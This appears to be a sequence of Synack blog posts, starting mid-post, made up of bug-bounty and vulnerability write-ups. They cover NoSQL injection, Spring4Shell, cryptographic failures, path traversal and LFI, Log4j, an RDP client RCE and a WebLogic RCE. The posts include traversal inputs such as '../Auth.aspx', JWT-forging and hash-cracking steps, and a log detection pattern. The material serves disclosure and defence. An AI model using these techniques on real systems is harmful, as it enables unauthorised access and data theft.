But I was still not happy with the results because only basic login information was leaked. Any sort of PII or sensitive information was not leaked from this endpoint.

I went back to my Burp history and found all the endpoints that had this$filterparameter. I had gathered a total of seven endpoints.

While closely inspecting the endpoints, I found one interesting endpoint called/api/[CLIENT_NAME]/CustomerLogins. This was interesting because it took the filter and returned PII in the response.

I used the same payload as above and sent the request. And the application leaked an email address, username, password hash and phone number of the administrator user! Not just any random user.

I reported all the endpoints and wrote a nice report. There were few other reports for the same vulnerability after the QR had ended, but my report managed to win.

You can reach out to me at @kuldeepdotexe on Twitter.

The post Exploits Explained: NoSQL Injection Returns Private Information appeared first on Synack.

By Kim Crawley

The impact of some software vulnerabilities is so far-reaching and affects so many applications that the potential damage is near impossible to measure. The series of vulnerabilities known as Spring4Shell is a perfect example.

The vulnerability is found in the Spring Framework, which is used in too many Java-based applications to name. Its framework contains modules that include data access and authentication features, so there’s a potential disaster if an attacker can exploit it.

Vx-underground shared news of the discovery of Spring4Shell and linked to a proof-of-concept exploit via Twitter on March 30. The vulnerability facilitates remote code execution and impacts Spring Core in JDK (Java Development Kit) 9 through 18. Frustratingly, Spring4Shell pertains to a bypass for another remote code execution vulnerability that researchers discovered in 2010. That alone emphasizes how critical Spring4Shell is, and how difficult it is to patch or otherwise mitigate.

Because Spring Framework’s modules have so many functions and because of how Spring Framework is used in so many different types of networking applications, there are many ways to exploit Spring4Shell.

One worrisome example is how Spring4Shell has been used to execute Mirai malware and acquire remote root access maliciously. 

First surfacing in 2016, Mirai botnet malware has been used by attackers to execute crippling assaults and now it’s coming back with a vengeance. It works by infecting routers and servers and giving attackers the ability to control massive botnet networks. One of the most damaging Mirai attacks hit the Dyn DNS network hard and took out much of the internet in October 2016.

Now, Spring4Shell is aiding the return of Mirai. Spring4Shell’s bugs have been used to write a JSP web shell into web servers with a carefully coded request. Then remote attackers use the shell to execute commands with root access. Mirai is downloaded to a web server’s “/tmp” folder before execution.

Spring4Shell is similar in many ways to Log4Shell, which was initially discovered in November 2021. Log4J is Apache’s Java logging utility that’s been implemented in a plethora of network logging applications from 2001 to today. It’s a little bit of useful software code that’s run in a wide variety of internet servers and services. Exploiting the Log4Shell vulnerability can give attackers administrative access to all kinds of internet targets. Ars Technica’s Dan Goodin called it “arguably the most severe vulnerability ever,” and Apache started deploying patches on Dec. 6. It has not been an easy job because there are multiple CVEs and they aren’t simple to fix. 

Spring4Shell and Log4Shell both pertain to Java’s vast libraries and resources. Java is one of the most commonly used application development technologies on internet servers and on a variety of types of endpoints, especially Android devices. The downside to a technology being so popular and useful is that it’ll also be a prime target for attackers. Inevitably, there will be many more devastating Java library vulnerabilities discovered in the years to come.

Businesses should quickly work to patch Spring4Shell and Log4Shell vulnerabilities across their entire networks. 

Rigorous, continuous pentesting can help organizations spot these vulnerabilities quickly. The more traditional approach to pentesting just isn’t robust enough to help organizations find and fix the latest complex vulnerabilities. 

Reach out today to discover how Synack can help. 

The post What’s the Spring4Shell Vulnerability and Why it Matters appeared first on Synack.

By Bruce Kang, Associate Security Operations Engineer

Introduction

In the 2021 iteration of the OWASP Top 10, Cryptographic Failures moved up one ranking to take the No. 2 spot. Its name also changed from “Sensitive Data Exposure” to “Cryptographic Failures” to more accurately describe the vulnerability. In this article, we will take a deep dive into this vulnerability and explain how and why it exists, and also how to prevent them from being exploited.

A Brief Explanation of Cryptography

To understand what falls under the broad category of Cryptographic Failures, it’s important to first understand what cryptography is exactly. To keep things simple, cryptography can be thought of as a way of secure communication so that sensitive information can only be viewed by authorized parties. The process for this usually involves having an original “plaintext” message, which is then put through some sort of encryption algorithm, which turns it into unreadable “ciphertext.” This ciphertext is then only able to be decrypted back to its original plaintext by the intended recipient(s), usually by using a cryptographic key that only the intended recipient(s) have access to. 

Implementations of Cryptography

Cryptography is ubiquitous in today’s computing world. It is implemented in technologies like:

• Protocols: HTTPS, FTPS, SFTP, SSH, SMTPS, etc. to ensure that all communication between two endpoints are encrypted.
• Hashing (one way encryption): passwords, authentication, file integrity verification, etc.
• Website certificates to verify authenticity.

Explanation of Cryptographic Failures

Since cryptography is used so widely and has many different implementations, there are several ways for vulnerabilities to occur. This could be through implementation errors, using weak encryption methods, not encrypting data at all, and much more. Therefore, a Cryptographic Failure vulnerability is a broad vulnerability category that encompasses all types of attacks that are related to anything cryptography related. As one could imagine, a vulnerability of this type could lead to serious consequences, as cryptography is meant to secure sensitive information. Thus, if there is a failure at any point in this process, this information could be exposed to any number of malicious attackers.

Simple Example with Man in the Middle Attacks

For our first example of a Cryptographic Failure, imagine if a banking website did not use HTTPS. To give some context, HTTPS encrypts traffic being sent between the user and the website, as opposed to HTTP which sends everything “in the clear”. This is very important considering things like passwords, social security numbers, etc. could be communicated between the user and website. Using HTTPS means an attacker would not be able to view the information being exchanged if they were to intercept the traffic. Therefore, failure to use HTTPS would make users vulnerable to what would be called a “Man in the Middle” attack. As the name suggests, this type of attack happens when an attacker is able to intercept traffic between two nodes and view the information being exchanged, usually possible by being on the same network. This attack would look something like this:

Here the attacker is able to view all the information the user is sending to the website, possibly including things like the credentials for their bank account. This is all because the website failed to implement the necessary cryptographic controls for preventing this attack.

Real World Example #1: Weak Ciphers 

Usually, a Man in the Middle attack can prove to be pointless if the data is encrypted, as the collected data will be impossible to read without the decryption key. However, there are ways to bypass this. A real example of this attack vector was found by one of our Synack researchers (sensitive information redacted). They found that the application they were testing was using weak, outdated block ciphers for encrypting communication being sent back and forth between the users and the application. It is important to remember that block ciphers encrypt data in “blocks” of data. The larger the blocks, the more layers of complexity are added to the encryption, in turn making the data harder to decrypt without the key. 

However, the application was found to be using only 64 bit block ciphers, an outdated method of block cipher encryption due to it being vulnerable to the “Sweet32” vulnerability (CVE-2016-2183, CVE-2016-6329). Without getting into the mathematics behind this vulnerability, it can essentially be understood as being used to crack any encryption that uses 64 bit block ciphers. Because of this, it has been advised to use encryption algorithms that use block sizes of at least 128 bits, such as AES. 

What this means is that attackers could potentially conduct a Man in the Middle attack (as described earlier) to capture encrypted traffic between the user and the application, then crack the encryption easily due to the weak cipher.

This vulnerability was found by the researcher utilizing a tool called testssl.sh (https://github.com/drwetter/testssl.sh). This tool was run against the target website like so:

After identifying that the website uses weak ciphers, testssl.sh can be used again to find that this causes it to be exploitable via Sweet32.

With this information, an attacker now knows that a Man in the Middle attack could be used to capture sensitive data, then easily be cracked using the Sweet32 vulnerability.

This vulnerability showcases how important it is to ensure that the strongest, most up to date encryption algorithms be used whenever possible, especially considering that encryption algorithms are constantly evolving.

Real World Example #2: Unencrypted Admin Credentials 

In our second real world example showcasing Cryptographic Failures, one of our own Synack researchers managed to find hard-coded admin credentials for an application through source code review (sensitive information changed or redacted). The researcher found that the target was running “Manage Engine Service Desk Analytics Plus Application.” Upon finding this, the researcher was able to request for the source code of this application from the vendor. 

The researcher then found that the source code contained hard-coded credentials

These credentials were then able to be used on the target that was running this application, thereby granting administrative access to the hosting server. This is a very clear and simple example of a Cryptographic Failure, as these credentials should have been encrypted or stored in a key vault, instead of being hard-coded into the source code.

Real World Example #3: Unencrypted file backups in Microsoft Azure 

This third example of Cryptographic Failures also shows an example of an organization not encrypting all of their data. A Synack researcher managed to find a client’s file backups that were not completely encrypted. Specifically, the vulnerable application backed up Office 365 mailboxes in a Microsoft Azure storage account, and claimed that these files were in fact encrypted with the key being stored in Azure Key Vault. However, the researcher discovered that the data was only encrypted server-side. This meant that the encryption would only protect the backups if an attacker were able to gain physical access to the hard disk on the host server, which would be incredibly difficult to do considering Microsoft Azure is a major cloud provider. 

Instead, the researcher found that any user who had access to the Microsoft Azure storage account would be able to view every mailbox that was backed up to it, without even needing the key. This vulnerability was found by first creating the backup via the vulnerable website: 

After the backup is created, a blob storage folder is created in the Azure storage account called “o365-backups”, which contains all backed up mailboxes and attachments. One could then view the location of any user’s attachments folder by logging into the storage account and accessing this URL: 

https://storage_account.blob.core.windows.net/o365-backups/<mailbox_user>/attachments/

From here all the researcher had to do was generate a download URL for any of the attachments found. After downloading the file, a Hex Editor can then be used to change the file from its original custom file format to a PNG, making it viewable. This would work for any attachments for other users on the application as well, potentially exposing sensitive information stored in user’s mailboxes.

What was probably intended here was for the storage account to be used to manage the mailbox backups without actually being able to read what was in them. Thus cryptography was not properly implemented and allowed the Azure storage account to view more information than was necessary, violating the principle of least privilege and potentially exposing sensitive information to unwanted eyes.

Real World Example #4: GitHub Exposes JWT Encryption Key 

This next example is very similar to the second one that was shown, as it involves the hardcoding of sensitive cryptographic information. This information was found through source code review on a client’s GitHub repository. One of our Synack researchers reviewed the publicly available code and found that it exposed a JWT private signing key. 

JWT stands for “JSON Web Token,” which is usually used for authentication. These tokens contain various data in JSON format about a user, and also must be signed by a private signing key in order to be used for authenticating into a specific application. If an attacker knows the fields needed for a valid JWT, and has the private signing key, it is possible for them to create their own valid JWT to impersonate other users. In turn, they would have full access to all that user’s data.

The researcher was first able to find this private key in the client’s GitHub repository

• Private static string privateKey = <KEY>

Using this private key, they then could generate a public key using openssl. Then, by using information found from the GitHub repository, the researcher was able to find the other fields used in the JWT. The resulting JWT was this. Note: the username of the user being impersonated must be known beforehand, likely through some type of user enumeration.

The header was also found to be using HS256

Then, a JWT generator website like https://jwt.io/#debugger-io could be used to combine all this information to create a valid JWT token that could be used. The payload, header, private key, and public key were all used to create the encoded JWT, as shown below.

This was then used to authenticate the application as “USER2” by changing the attacker’s cookie. The researcher then had access to all of USER2’s data.

Thus, it is important to remember that hardcoding sensitive information into viewable source code is almost always bad practice.

Real World Example #5: Crackable Password Hash Retrieval 

Cryptographic Failure vulnerabilities can also arise when the original plaintext itself is not following best practices. This mostly applies to the encryption of passwords, as having weak passwords can often lead to them being compromised, even if proper encryption is used to hash them. 

Offline password cracking usually involves having a set of compromised passwords that are still hashed, then using some kind of cracking tool to decrypt them. These include tools like hashcat, John the Ripper, THC Hydra, and more. The basis of all these tools is that they will go through each hashed password and attempt to guess the plaintext using a wordlist of common passwords, or use a rainbow table of pre-calculated hashes for common passwords.

An example of this involves another one of our Synack researchers, who cracked an administrator’s password for a server management application running on a client’s network. The researcher was first able to find that the vulnerable host was running HP Integrated Lights-Out (iLO), which uses the IPMI v2 authentication protocol. The problem is that IPMI v2 has a design flaw that could be used to dump the password hash of the requested user, before even authenticating. The only requirement is that a valid username be known. The following Metasploit module can be used to dump these hashes.

After the password hashes are retrieved, they can then be cracked offline. Normally, strong passwords that are salted are extremely hard to crack. This is because 1) a unique, complex password will generate an equally unique hash that is not part of any existing rainbow tables, and the password itself will not be in any common brute force wordlists.  2) Salting the password adds more complexity to the hash, as it will add a unique, random string of characters to each password before it is hashed, which is then only known by the application.

However, the researcher found that this application was not following either of these practices for their administrator passwords, and thus was able to crack them very easily. All the researcher had to do was run hashcat on a text file containing the dumped hashes, along with another text file containing common administrator usernames (admin, administrator, root, etc.).

These credentials could then be used to gain administrative access to iLO, in turn allowing the attacker to have a shell environment on the host. This vulnerability has even been reported as being used in ransomware attacks: https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces. 

This is why it is of the utmost importance to ensure that strong password policies are enforced to ensure that they cannot easily be cracked. Best practices include having policies around password length, complexity, or just using a password management solution.

Final Thoughts

Ensuring that cryptography is properly implemented is critical. Understanding why cryptography is important and how it works is paramount to using it correctly. To find out more about preventing these vulnerabilities, The OWASP guide can be found here. 

It is clear why the OWASP Top 10 has put Cryptographic Failures so high up on its list, as the prevalence and consequences of these vulnerabilities are enormous. Learn more about how Synack can help prevent these and other vulnerabilities in your systems here.

The post Preventing Cryptographic Failures: The No. 2 Vulnerability in the OWASP Top 10 appeared first on Synack.

By Kuldeep Pandya

 

Hi, guys!

This blog will be about all the different kinds of Path Traversals and Local File Inclusion vulnerabilities that I have found in Synack Red Team.

After hacking on Synack Red Team for approximately 9 months, I came to realize that Path Traversal and LFI like vulnerabilities are very common. I reported a few authenticated vulnerabilities and a few unauthenticated. However, I will try to cover both kinds of vulnerabilities.

Before moving forward, I’d like to list all my Path Traversal/LFI submissions.

Submissions

Submission	Status
Path Traversal Vulnerability Leads To Source Code Disclosure	Accepted
Local File Inclusion in VMWare VCenter running at [REDACTED]	Accepted
Spring Boot Path Traversal – CVE-2020-5410	Accepted
Local File Inclusion In download.php	Accepted
Local File Inclusion In download.php	Rejected (Duplicated my previous report)
Local File Inclusion In download.php	Rejected (Duplicated during Initial Launch Period)
Path Traversal Allows To Download Licence Keys	Accepted

Descriptions

Path Traversal Vulnerability Leads To Source Code Disclosure

This was the very first Path Traversal vulnerability that I had found in Synack Red Team. Also, even though I was pretty new to the platform and to the whole bug bounty thing in general, this report was selected during the Initial Launch Period, where the best write-up is chosen, not necessarily the first valid report.

After logging into the application, the application provided a bunch of sections like manage vendors, manage inventory, etc with a bunch of functionalities.

Upon further inspecting these sections, I came across an interesting functionality that involved importing the data. The file was named DataImport.view.

I tried getting RCE by uploading an ASPX web shell and it actually worked! Reported it and that report got accepted too! However, that’s a different story. We want to discuss Path Traversals here and not RCEs.

So, after successfully uploading a file, we were given the functionality to read the file.

After clicking the “ReadFile” button, it filled the file name field to the current uploaded filename by default. However, we had the ability to change the file name.

Now, I just had to provide a valid file name. For this, I used the Auth.aspx to which the login request was sent. I could be sure that this exists because a login request was sent to this file and it resided in the webroot.

So, I tried to do path traversal using payloads like ../Auth.aspx and ../../Auth.aspx etc.

And, after three ../ sequences, the file was actually returned!

The response looked like this:

The file was broken because some sort of XML parsing was done on it. I still went ahead and reported it because it was still a path traversal issue and disclosed source code contents.

I could do more creative things here like pulling more sensitive files but I stopped here because very limited time was left in the Initial Launch Period. I initially did not care much for this vulnerability as I had already reported an RCE there but then quickly made a report in under 15 minutes putting together all my PoCs and I still had my report selected as the best write-up during the Initial Launch Period.

Local File Inclusion in VMWare VCenter Running at [REDACTED]

This was the classic VMWare VCenter /eam/vib LFI vulnerability.

The /eam/vib endpoint in VMWare VCenter instances takes a parameter named id in the GET request. The value to this id parameter is a file name that will be retrieved by the VCenter instance and will be given back in the response.

There are already many resources regarding this particular vulnerability and I do not think much is to be said about it in this particular article.

I used the following payload to retrieve the hosts file off the remote server:

There were some IP to host mappings in the hosts file which I thought was enough for impact but with creativity, more could have been achieved.

I reported the issue during the Initial Launch Period, and this was selected.

Spring Boot Path Traversal — CVE-2020-5410

This was a known vulnerability in Spring Boot Cloud Config server. For PoC, I referred to this article here:  http://www.jrasp.com/case/CVE-2020-5410.html

That article talks in detail about the vulnerability and also explains the source code.

I did not read that much and simply took the PoC from there and used it on the target that I had for testing. And the exploit worked!

I used the same payload as in the PoC which is:

The above payload retrieves the /etc/passwd file.

However, this was Java and one odd thing about Java Path Traversals/LFIs is that if you specify a directory instead of a file for opening, it will actually list the content of that directory.

So, for example, if I did not know what files were in the /etc directory, I would simply use the following payload to list all the files:

This is just the previous payload with the trailing /passwd removed. Now, we are just listing the contents of the /etc directory.

I used this feature to list the contents of the root directory in the affected Linux server. In the root directory, I found a file named application.jar which was potentially the source code of the currently running Spring Boot Cloud Config server.

Also, the root directory had a file .dockerenv so I was quite sure that I was in a docker container.

However, Synack Red Team has the stop-and-report policy according to which, we are not supposed to do post-exploitation.

I reported the issue during the 8 hour initial launch period. And nobody checked for this particular vulnerability, so mine was the only report during that time.

Local File Inclusion in download.php

I have already discussed this vulnerability in my previous article and you can find it here:  Local File Inclusion In download.php

Path Traversal Allows To Download Licence Keys

This path traversal was also very interesting. This was in a custom-built application and it did not require any authentication.

When we visited the webroot, the web application redirected us to the login page.

The login page was custom built and there was a brand logo along with the login page so I cannot show you the screenshots.

Upon visiting the login page, a request to the /web/product_logo endpoint was sent. The request contained a GET parameter named logo.

Overall, the request URL looked like this:

The parameter logo took a file name as the input and returned that particular file in the response. In this case, it was logo.png.

Now, as this is functionality to read files, there may be a potential LFI/Path Traversal here. So, I changed the file name to random file names like index.html, index.php, index.js etc. However, none of them worked.

So, I ran ffuf hoping to discover more files but it was a failure. I used the raft-small-files-lowercase.txt provided in the SecLists.

I did not know the underlying technology which is used so it was quite painful to enumerate files.

However, I knew it was a Windows box because of the case-insensitive directory structure. What it basically means is that, in Windows, WinDows and Windows are the same directories/files as it is not case sensitive. And when I was doing my recon, I received the same response when I did /web or /Web so I was quite sure it was a Windows box.

There are other ways to determine this too but I decided to assume it was Windows.

Same as my past submissions, I decided to read the C:/WINDOWS/System32/drivers/etc/hosts file of the remote server.

So, I used a path traversal payload and the final URL looked like this:

However, one ../ sequence did not work. So I kept increasing the ../ sequences.

Finally after 10 ../ sequences, I finally hit the hosts file and the server retrieved it for us.

The final payload looked like this:

The post Path Traversal Paradise appeared first on Synack.

Testing for CVE-2021044228 (Log4j) with Synack

Since Friday, December 10, 2021, researchers from the Synack Red Team (SRT) have been solving customer needs related to CVE-2021-44228—the CVE that details a critical log4j vulnerability with wide-reaching implications across industries.

Responding to the Critical Vulnerability with Synack Testing

By 8 A.M. PST, when its magnitude and implications became clear to Synack operations, a new CVE entry was created in the Synack Platform to address CVE-2021-44228. Log4j immediately became available for customers to launch, long before most of the world read about the vulnerability in headlines and social feeds.

Synack CVE Checks connect an organization to SRT researchers capable of accomplishing specific security tasks. In this case, organizations can select CVE-2021-44228 within the Synack Platform and have a researcher check for the vulnerability on-demand.

Testing with the Best Researchers on the Planet

Over 30 SRT members assembled to cultivate ideas and improve the entire community’s efficiency and effectiveness. Together, they are bringing a diverse spectrum of perspectives from different backgrounds, ranging from military and government to academia and tech. This collaboration of top researchers allows Synack to improve the quality of testing for all customers with better processes, tools, and payloads.

The SRT often shares best practices within the community to help each other level up and make the entire internet safer. Compared to traditional testers or automated scanning tools, the SRT brings these sorts of advantages: human collaboration, diversity and creativity.

The Landscape of CVE-2021-44228 Across Industries

Since Friday morning, Synack has checked over half a million IP addresses across our customer base, confirming the status of thousands of CVE-2021-44228 checks and providing detailed reports containing proof of work and methodologies. With a combination of human intelligence and automated tools, Synack is addressing the vulnerability at an unprecedented scale and pace.

Vulnerable instances span across countries and industries and exist both in the government and private sectors. The urgency of the vulnerability has not been overstated by news outlets and social media – Synack recommends that customers activate the CVE check as soon as possible.

Checking for CVE 2021-44228 On-Demand—The Advantages of Synack Campaigns

Since the weekend that followed the CVE’s publication, Synack customers have utilized the Synack Platform to activate hundreds of checks from researchers around the world.

Synack beats other models to the punch. Scanners do not yet have the vulnerability’s signature, traditional pentesting engagements take significant time to spin up, and other bug bounty models do not provide the immediacy or certainty of a vulnerability as this one requires. The model provides on-demand services relevant to CVEs today and prepares organizations for the next 0day like CVE-2021-44228. Reach out to a Synack representative today to explore existing CVE checks, as well as other offerings available in the Synack Catalog.

The CVE-2021-44228 testing provided by Synack provides immediate results and reporting. The researcher will provide a clear yes/no answer on an asset’s vulnerability status, as well as details about their methodology, screenshots, and general proof of work.

Activate the Synack CVE-2021-44228 Test Today

Reach out to your Synack representative to activate the CVE-2021-44228 test today. If you’re new to the Synack Platform, reach out to us here and learn how to get started with Synack’s on-demand security platform and pentesting.

Update: Synack was asked whether our systems are vulnerable to Log4j. Synack does not use Log4j and has determined that we are not vulnerable to exploitation. In response to increased attack traffic attempting to exploit the vulnerability, we have taken additional steps to block the malicious traffic accordingly.

The post Providing On-Demand Testing for CVE-2021-44228 (Log4j) with Synack Testing appeared first on Synack.

By Malcolm Stagg

The Microsoft Windows RCE Vulnerability, or CVE-2021-34535, is a Remote Code Execution (RCE) vulnerability in Remote Desktop Client, found by SRT member Malcolm Stagg earlier this year, and patched by Microsoft in August 2021.

Finding the Vulnerability

I found this vulnerability by looking at the disassembly of several Windows dll’s in IDA debugger for potential memory access flaws. Protocol parsing code, especially code involving multimedia decoding, tends to be a common place for flaws since the protocol decoding is often complex. When raw pointers to memory buffers are used directly, it is easy to make a mistake that can lead to a serious memory access vulnerability.

Looking at occurrences of memcpy, the C function that copies data between two memory buffers, I found one occurrence in the TSMF media decoder that showed signs of having a complex access pattern. TSMF is a legacy plug-in for Remote Desktop, in which the Remote Desktop Server transfers a multimedia file to be played by the Remote Desktop Client. 

First, the decoder allocates a heap buffer with the size cbData+63 bytes, where cbData is a field from a packet that attackers can control. Next, cbData+36 bytes of data are copied from the packet into the buffer. The remaining 27 bytes are intended to be filled with data from a separate buffer.

This access pattern looks innocent enough until you look at cases involving an integer overflow. cbData is a 32-bit unsigned integer, so it can represent any number between 0 and approximately 4 billion. By specifying a buffer size just slightly below that upper limit, an integer overflow will occur, causing a very small buffer to be allocated, and a huge amount of attacker-controlled data copied into that buffer. The result is a heap buffer overflow, where structures throughout the program’s memory space are overwritten with attacker-controlled data.

Exploiting the Vulnerability

There are two main scenarios for how an attacker could exploit this vulnerability. One of these is by gaining control of a Remote Desktop Server. An attacker could take control of a victim’s machine when it connects to the malicious Remote Desktop Server, exploiting this vulnerability to run code that escapes from the Remote Desktop Client onto the victim’s machine.

The other scenario, which is perhaps even more interesting, is a Hyper-V Client escape. Unless “Enhanced Session Mode” is explicitly disabled by the user, Hyper-V uses Remote Desktop Client dll’s while accessing a virtual machine. By doing so, features like clipboard sharing and printing are enabled, improving the user experience. If a virtual machine is running malicious software, an attacker could exploit this vulnerability to escape from the Hyper-V Client and gain control over the host machine. Since users often run untrusted software inside a virtual machine to provide better security and isolation, this is an interesting case that could have a serious impact.

Proof of Concept

The vulnerability was fairly difficult to exploit for two reasons: one is that it will always result in a client crash. Approximately 4 GiB of data is copied into an extremely small buffer, so a memory access violation is inevitable. The attacker’s payload must be successfully executed before the client crash occurs.

The other difficulty in exploitation is due to Address Space Layout Randomization (ASLR), a security feature designed to make memory access vulnerabilities more difficult to exploit by providing randomization of memory addresses. Since this vulnerability in itself provides no way of bypassing ASLR, for the purposes of demonstration, it is assumed that the attacker has some other way of bypassing it. A common method would be finding an information disclosure vulnerability where a program’s internal memory pointers are exposed to the attacker.

Ultimately, a proof of concept was developed by finding a target function where Hyper-V Client jumps to a memory address stored within the attack payload. To obtain remote code execution, a couple of “gadget” functions were also found. Gadgets are existing functions within the program which have been repurposed by the attacker to perform a task.

The first gadget causes a memory pointer to jump from its initial, random, location within the attack payload to a specific location known to the attacker. This known location specifies a second gadget function and a program name. The second gadget function causes the program name to be read from the attack payload and executed.

The proof of concept is demonstrated in the following video, showing how executing a program within a virtual machine can result in a Calculator executing on the host machine.

 

Preventing These Vulnerabilities

This specific vulnerability could have been prevented by the developers performing several additional validation checks:

1. Validate all user-controlled data and buffer sizes
2. Check for integer overflow edge cases
3. Verify a buffer’s length before copying any data

Memory access vulnerabilities are most common when using raw pointers directly, so those should be avoided whenever it’s feasible to do so.

Protecting Yourself

If you’re accessing an untrusted virtual machine in Hyper-V or running an untrusted program on your virtual machine, disable “Enhanced Session Mode” whenever you can to reduce your attack surface. 

Always be cautious when accessing a Remote Desktop Server you don’t explicitly trust. It is best to only access machines with which you are familiar.

Finally, by keeping your computer up-to-date and installing the latest Windows Update patches, your computer will be protected from many new vulnerabilities, including this one!

 

 

The post This Microsoft Windows RCE Vulnerability Gives an Attacker Complete Control appeared first on Synack.

Let’s face it.  One of the most humbling realizations for most companies is that, regardless of their size, money, or stature, they rarely get the opportunity to choose which cyber threat will end up on their doorstep, and when.  It’s the ever-present permeating thought that casts infinite shadows into every corner of critical infrastructure and sends security teams scrambling to prepare for an endless list of possible scenarios.  While some companies struggle to fill open cybersecurity roles for various reasons, which may or may not include unrealistic expectations and/or prerequisites, others have found relief by complementing their security posture with crowdsourced security platforms like Synack and the Synack Red Team (SRT).  Not only does this hybrid model provide a scalable platform for doing ad-hoc security campaigns on the fly, but it also infuses much-needed diversity into an inevitably converging pool of homogenized internal checkpoints.  This is why Synack and Hack The Box (HtB) are working together to open doors to diverse talent around the world in cybersecurity. Maybe one of these doors is right for you?

Open Invitational CTFs

Every year, the SRT hosts an open invitational CTF, which allows researchers from all over the world to showcase their talents, win prizes and earn a shot at joining the SRT.  These events are great ways for skilled applicants from any background to bypass the SRT Waitlist, a mechanism put in place to ensure that Synack grows the SRT proportional to researcher opportunity.  While prizes may be limited for top-performing researchers, Synack evaluates everyone’s individual CTF performance stats when determining any SRT invitations.  This ensures a fair and meritocratic evaluation process for all players, especially if they can’t commit to the entire CTF duration.

 

Fighting Imposter Syndrome

Imposter syndrome is real.  Oftentimes, people may not even recognize the symptoms and how debilitating they can make you feel.  “Am I ready?”  Questions like these and unending self-doubt are reasons that some researchers don’t even try … cue the Synack Red Team Track on HtB released in early 2021!  The intent is to build confidence for applicants struggling to determine their readiness and create a low-cost and fun alternative to certifications for up-and-comers to get their foot in the door.  Applicants who can complete this track (in earnest, and on their own) should have the skills to perform well on the SRT private tech assessments (WebSec, NetSec, CloudSec).  These assessments are custom built by the-one-and-only IppSec and refreshed regularly to deter cheating and incorporate new vuln trends seen in the wild by the SRT Circle of Trust.  Yes, certifications can help, but Synack cares that you actually know the skills more than a piece of paper.  Even if you don’t pass, the experience is a great learning opportunity for anyone that gives an honest effort.

Due to the overwhelming popularity of the program, Synack has made a slight change to maintain our commitment to proportional SRT opportunity and responsible community growth. 

 

More times than not, the most successful SRT embodies three core common traits:  talent, quality reporting, and speed.  Due to the number of applications we receive every month, only talent can be adequately screened at scale.  Quality reporting and speed are typically refined as researchers familiarize themselves with Synack’s reporting standards and optimize their TTP.  We hope this information will set proper expectations with any potential applicant and help them make a plan to move forward with confidence.

Investing in Diversity

The name of the game in cybersecurity is diversity, whether that be age, gender, ethnic, regional, neural, or skill.  Companies need broad-spectrum coverage from all different perspectives to try and keep pace with adversaries, and there are just far too many underrepresented groups in ethical hacking to make it an even fight.  While diversity may be the name of the game, it’s hard to play when you don’t get a chance to step up.  This is why Synack invests in programs like Synack Academy and partners with organizations like Blacks in Cybersecurity, BUiLT, and SANS to offer career awareness and mentorship in cybersecurity.  Similarly, the SRT has programs for qualified veterans, women & other gender minorities, college and 18-and-under (our latest closed beta initiative) hackers to create unique opportunities for camaraderie, mentorship, and career support.  As researchers work their way up the SRT reputation ladder, they can use their payouts to purchase more refined education/certifications and earn a spot on the Synack Acropolis to help fill out their resumes and grow their careers.  

Cybersecurity is never static.  Problems and solutions change every day, but the need for skilled personnel to actually do the work continues to grow.  The world needs more companies, and more people, to step up and lead the charge for ethical hacking.  Crowdsourced security platforms are essential for the good guys to stand a chance in the long run. The world needs talented researchers to share their skills with more than just one enterprise at a time, and companies around the world are quickly waking up to this reality. Every day, more and more companies are encouraging employees to try this alternate type of cybersecurity training because they see the benefit. If you think your employer would object, sometimes, all you need to do is ask! I, for one, am proud of all the work Synack and HtB have done to date, and look forward to our continued efforts to close the cybersecurity skill shortage while making the industry more diverse and the world more secure. “Where we go from here, I leave to you!” 

 

Ryan Rutan
Senior Director of Community, Synack Red Team

P.S. A special shout-out to @morphean_sec and his write-up that helped me realize, sometimes you need to stop running for a moment to let others know how all the work you’ve been doing fits together.  Keep up the hustle, and good luck on the CTF! =)

The post Synack + Hack The Box: Opening Doors to CyberSecurity Diversity appeared first on Synack.

A Vulnerability in an Oracle WebLogic Server Allows Attackers to Perform Remote Code Execution via HTTP Request

In this installment of Exploits Explained, we’re going to demonstrate a vulnerability in an Oracle WebLogic Server that allows attackers to perform remote code execution via a single HTTP request.

Exploit teardown credit goes to Jang on medium.

To see the vulnerability in action, read on, or check out this video walkthrough:

This vulnerability was recently encountered by one of our Synack Red Team researchers during a web application penetration test. 

Here’s why this vulnerability is such a big deal:

1. It’s a Remote Code Execution (RCE) Vulnerability, which is the root cause of many modern Ransomware attacks
2. It affects a widely distributed application
3. There’s a public exploit available
4. It’s not hard to pull off and requires no authentication

While this particular vulnerability has already been patched, we’ll walk you through how an attacker would be able to exploit this in the wild. 

Oracle WebLogic Server sets an auth flag based on URL paths in requests. Attackers were able to determine the allowed paths via the values set in “WebAppSecurityWLS.getConstraint ()”.  In this attack, the path is set to /css/, and when the web application evaluates the request, it sets the value of “flag unrestrict”  to true. This allows the request to be passed along unauthenticated. The attacker then utilizes the path traversal to access the console.portal endpoint.

The console.portal portion of the web application can use a constructor called ShellSession.exec () which allows for system commands on both Linux and Windows systems.

These commands are sent via an MVEL expression under the handle “com.tangosol.coherence.mvel2.sh.ShellSession”In the publicly available exploit, the MVEL expression contains a function to evaluate the value of an HTTP header value named cmd and uses this value for the command to be executed. As seen here:

The output of the command is then written into the server’s response where the attacker can see the results of the command sent.

The server’s response for the commands whoami and ipconfig can be seen here:

This was patched in the October 2020 Critical Patch Update or CPU. These are some of the affected versions:

10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0

Organizations running these versions of Oralce WebLogic Server should review logs for HTTP requests made to the console.portal endpoint or any requests containing the double url encoded value for ../ (%252E%252E%252F)

Organizations should also check for any suspicious processes spawned by the application. This typically includes cmd.exe ( for windows) or /bin/sh (for *nix systems).

It’s critical that organizations check to make sure they can’t be compromised by this vulnerability by performing penetration testing. We recommend taking a crowdsourced penetration testing approach for higher quality results and to achieve a true adversarial perspective. 

Stay tuned to the Exploits Explained series for further walkthroughs of vulnerabilities encountered by the SRT in the field. 

Learn more about the SRT, or about Synack’s crowdsourced penetration testing at www.synack.com

The post Exploits Explained Part 2 – Remote Code Execution (RCE) via a Single HTTP Request appeared first on Synack.